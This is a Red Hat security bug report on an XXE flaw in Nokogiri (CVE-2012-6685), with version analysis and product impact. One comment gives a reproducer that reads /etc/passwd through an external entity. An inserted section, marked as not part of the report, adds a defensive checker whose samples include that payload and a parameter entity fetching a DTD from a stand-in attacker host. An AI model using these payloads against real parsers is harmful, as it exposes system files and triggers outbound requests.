Bug 1178970 - (CVE-2012-6685) CVE-2012-6685 rubygem-nokogiri: XML eXternal Entity (XXE) flaw
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
Whiteboard: impact=moderate,public=20120606,repor...
Keywords: Security
Depends On: 1178972 1178971
Blocks: 1178979
Reported: 2015-01-05 14:38 EST by Martin Prpič
Modified: 2018-06-29 18:03 EDT (History)
CC: 48 users
Fixed In Version: nokogiri 1.6.4
Doc Type: Bug Fix
Attachments: None
Description Martin Prpič 2015-01-05 14:38:27 EST
An XML eXternal Entity (XXE) flaw was found in Nokogiri, a Ruby gem for parsing HTML, XML, and SAX. Using external XML entities, a remote attacker could specify a URL in a specially crafted XML that, when parsed, would cause a connection to that URL to be opened.

A patch shipped with the 1.5.4 release of Nokogiri provided a "nonet" option to disable external connections. However, local file URLs could still be used to exploit this flaw. The 1.6.4 release of Nokogiri fixed this issue by using libxml2 2.9.0.

Additional information is detailed at:

https://github.com/sparklemotion/nokogiri/issues/693#issuecomment-68334768

CVE request and assignment:

http://seclists.org/oss-sec/2015/q1/57
Comment 1 Martin Prpič 2015-01-05 14:40:43 EST
Created rubygem-nokogiri tracking bugs for this issue:

Affects: fedora-19 [bug 1178971]
Affects: epel-all [bug 1178972]
Comment 2 Mamoru TASAKA 2015-01-05 21:15:05 EST
Fedora (and perhaps EPEL) uses external libxml2, not bundled libxml2, so this should not affect Fedora (and perhaps EPEL) rubygem-nokogiri. Would you confirm?
Comment 3 Mamoru TASAKA 2015-01-05 21:17:19 EST
By the way Fedora 19 gets EOL today.
https://lists.fedoraproject.org/pipermail/announce/2014-December/003243.html
Comment 4 Martin Prpič 2015-01-06 03:49:34 EST
(In reply to Mamoru TASAKA from comment #2)
> Fedora (and perhaps EPEL) uses external libxml2, not bundled libxml2, so
> this should not affect Fedora (and perhaps EPEL) rubygem-nokogiri. Would you
> confirm?

Hello, I had a look at the EPEL-7 package and it does bundle libxml2, specifically version 2.8.0. This version is also listed in the dependencies.yml file. Also, from the GitHub comment pasted in comment #0:

"""
People using a system-provided libxml2 library that is < 2.9.0 will still be vulnerable no matter what version of Nokogiri they are using. People using a system-provided libxml2 library that is >= 2.9.2 will be patched no matter what version of Nokogiri they are using.
"""

That means that even if Nokogiri uses the system-provided library and not the bundled one, it would use libxml2 2.6.26 on EL5 and 2.7.6 on EL6, both of which are vulnerable. EL7 uses libxml2 2.9.1, which means Nokogiri should be updated to 1.6.4 at least (unless libxml2 is updated to 2.9.2).

And yes, the Fedora tracker can be closed as of today :)
Comment 5 Ján Rusnačko 2015-02-10 11:07:16 EST
How to reproduce:

require 'nokogiri'
# Inline DTD declaring an external general entity that points at a local file
xml = "<!DOCTYPE root [ <!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<root><e>&ent;</e></root>"
d = Nokogiri::XML.parse(xml)
# Text content of <e>: on a vulnerable Nokogiri/libxml2 this is the file's contents
d.children.children.children.text

Should not return the contents of /etc/passwd, but an empty string.


Analysis:

For this to be exploitable, both Nokogiri and the libxml2 that it uses must be vulnerable. Up until 1.6.0 Nokogiri used the system libxml2; from that version upwards, upstream bundles libxml2 together with Nokogiri but gives an option to use the system libxml2 anyway. Last but not least, entity expansion has been an issue in libxml2 itself, and the patches for those issues prevent this Nokogiri issue too. For details, read on.

There are two flaws in Nokogiri and underlying libxml2:
* general XXE attack
* parameter expansion attack

The parameter expansion attack is fixed in Nokogiri by introducing the NONET patch in 1.5.4, disallowing network connections, and in libxml2 2.9.2. Additionally, the patch for CVE-2014-0191 (see bug 1090976) also prevents the parameter expansion attack.

The general XXE attack is fixed in:
* Nokogiri 1.5.4 by the NONET patch, but it still allows inclusion of local files
* libxml2 2.9.0 contains bugfix: Do not fetch external parsed entities
* libxml2 2.9.2 contains security fix: CVE-2014-0191 Do not fetch external parameter entities
* the fixes for two issues above were backported to RHEL-6 in libxml2-2.7.6-9.el6 and libxml2-2.7.6-15.el6
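The following is an added example, not part of this bug report and not code from the Nokogiri project. It turns the reproducer in comment 5 and the analysis above into a check a practitioner can apply: untrusted XML is scanned for a DTD that declares an external subset, an external general entity (SYSTEM/PUBLIC) or any parameter entity before it reaches the parser, because on libxml2 < 2.9.0 even NONET leaves file:// entities loadable; the loaded libxml2 version is then compared against 2.9.0 (a plain version compare cannot see distro backports such as libxml2-2.7.6-15.el6, so it is a hint, not a verdict); and documents that pass are parsed with STRICT | NONET and without NOENT or DTDLOAD. The sample documents are constructed, attacker.invalid is a placeholder host, and the parse function assumes the nokogiri gem is installed.

```ruby
require 'rubygems' # for Gem::Version

# Constructed sample documents. The first mirrors the reproducer in comment 5.
XXE_LOCAL_FILE = <<~XML
  <!DOCTYPE root [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
  <root><e>&ent;</e></root>
XML

# Parameter-entity variant: the external DTD is fetched as soon as %ext; is
# referenced, before any element content is seen. Host is a placeholder.
XXE_PARAMETER = <<~XML
  <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd"> %ext; ]>
  <root/>
XML

# Internal entity only: no URL or file involved, so it should be accepted,
# even though the word SYSTEM appears inside the quoted value.
BENIGN_DTD = <<~XML
  <!DOCTYPE root [ <!ENTITY greeting "hello SYSTEM"> ]>
  <root><e>&greeting;</e></root>
XML

NO_DTD = "<root><e>plain</e></root>"

# Return the DOCTYPE declaration (including its internal subset), or nil.
def doctype_of(xml)
  m = xml.match(/<!DOCTYPE\b[^\[>]*(\[.*?\])?\s*>/m)
  m && m[0]
end

# True when the DTD makes a conforming parser open a URL or a file:
# an external subset on the DOCTYPE itself, an external general entity
# (SYSTEM/PUBLIC identifier), or any parameter entity (<!ENTITY % ...>).
# Quoted literals are blanked first so words inside entity values do not count.
def declares_external_entities?(xml)
  dtd = doctype_of(xml)
  return false unless dtd
  unquoted = dtd.gsub(/"[^"]*"|'[^']*'/, '""')
  !!(unquoted =~ /\b(SYSTEM|PUBLIC)\b/ || unquoted =~ /<!ENTITY\s+%/)
end

# libxml2 < 2.9.0 fetches external parsed entities even without NOENT, so the
# Nokogiri version alone says nothing; check the library actually loaded.
# Caveat: this misses distro backports (comment 5: RHEL 6 carries the fix in
# libxml2-2.7.6-15.el6), so treat true as "verify against the package changelog".
def libxml2_fetches_external_entities?(loaded_version)
  Gem::Version.new(loaded_version) < Gem::Version.new("2.9.0")
end

# Parse untrusted XML: refuse anything declaring external or parameter entities,
# then hand the rest to Nokogiri in STRICT mode with NONET and deliberately
# without NOENT or DTDLOAD, so references stay unexpanded and no DTD is fetched.
# Assumes the nokogiri gem is installed.
def parse_untrusted(xml)
  if declares_external_entities?(xml)
    raise ArgumentError, "refusing XML that declares external or parameter entities"
  end
  require 'nokogiri'
  loaded = Nokogiri::VERSION_INFO.dig("libxml", "loaded")
  if loaded && libxml2_fetches_external_entities?(loaded)
    warn "libxml2 #{loaded} predates 2.9.0; relying on the pre-parse check"
  end
  opts = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
  Nokogiri::XML::Document.parse(xml, nil, nil, opts)
end

if __FILE__ == $PROGRAM_NAME
  [XXE_LOCAL_FILE, XXE_PARAMETER, BENIGN_DTD, NO_DTD].each do |xml|
    verdict = declares_external_entities?(xml) ? "REJECT" : "accept"
    puts "#{verdict}: #{xml.lines.first.strip}"
  end
  begin
    puts parse_untrusted(BENIGN_DTD).at_xpath("//e").text
  rescue StandardError, LoadError => e
    puts "nokogiri parse skipped (#{e.class}); the pre-parse checks above still apply"
  end
end
```

The pre-parse rejection is the control that holds regardless of which libxml2 Nokogiri ends up linked against; the version check only tells you whether you are relying on it alone.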
Comment 7 Vasyl Kaigorodov 2015-03-16 08:25:09 EDT
Statement:

This issue affects the versions of ruby193-rubygem-nokogiri as shipped with Red Hat Satellite 6 and Red Hat OpenStack 6. Red Hat Product Security has rated this issue as having moderate security impact. A future update may address this issue.

Red Hat Product Security has rated this issue as having no security impact for rubygem-nokogiri as shipped with: Red Hat Enterprise MRG 2.5, Red Hat Subscription Asset Manager 1.3, Red Hat CloudForms Management Engine 5.3.0, Red Hat OpenShift Enterprise 2.2.0; for ruby193-rubygem-nokogiri as shipped with Red Hat Satellite 6, Red Hat Subscription Asset Manager 1.3, Red Hat CloudForms Management Engine 5.3.0, Red Hat OpenStack 4.0, Red Hat OpenStack Foreman, Red Hat OpenStack 6, Red Hat OpenShift Enterprise 2.2.0; and for mingw-rubygem-nokogiri as shipped with Red Hat CloudForms Management Engine 5.3.0. This issue is not currently planned to be addressed in future updates.

For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
